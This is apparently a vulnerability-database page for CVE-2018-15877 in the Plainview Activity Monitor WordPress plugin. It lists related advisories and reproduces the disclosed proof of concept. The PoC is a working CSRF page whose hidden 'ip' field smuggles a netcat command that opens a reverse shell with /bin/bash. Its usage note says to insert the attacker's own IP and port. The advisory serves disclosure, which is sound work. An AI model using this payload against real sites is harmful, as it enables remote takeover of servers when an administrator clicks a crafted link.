| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| WordPress Plainview Activity Monitor 20161228 Plugin - Command Injection Exploit | 28 Aug 201800:00 | – | zdt | |
| WordPress Plainview Activity Monitor 20161228 Remote Command Execution Exploit | 30 Nov 201900:00 | – | zdt | |
| WordPress Plainview Activity Monitor 20161228 Plugin - Remote Code Execution (Authenticated) Exploit | 7 Jul 202100:00 | – | zdt | |
| CVE-2018-15877 | 26 Aug 201800:00 | – | attackerkb | |
| CVE-2018-15877 | 27 Aug 201800:00 | – | circl | |
| WordPress Plainview Activity Monitor Plugin OS Command Injection Vulnerability | 27 Aug 201800:00 | – | cnvd | |
| WordPress Plainview Activity Monitor Plugin Command Injection (CVE-2018-15877) | 5 Sep 201900:00 | – | checkpoint_advisories | |
| CVE-2018-15877 | 26 Aug 201807:00 | – | cve | |
| CVE-2018-15877 | 26 Aug 201807:00 | – | cvelist | |
| WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2) | 7 Jul 202100:00 | – | exploitdb |
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)
Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list
Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.
References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/
PoC:
-->
<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: LydA(c)ric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation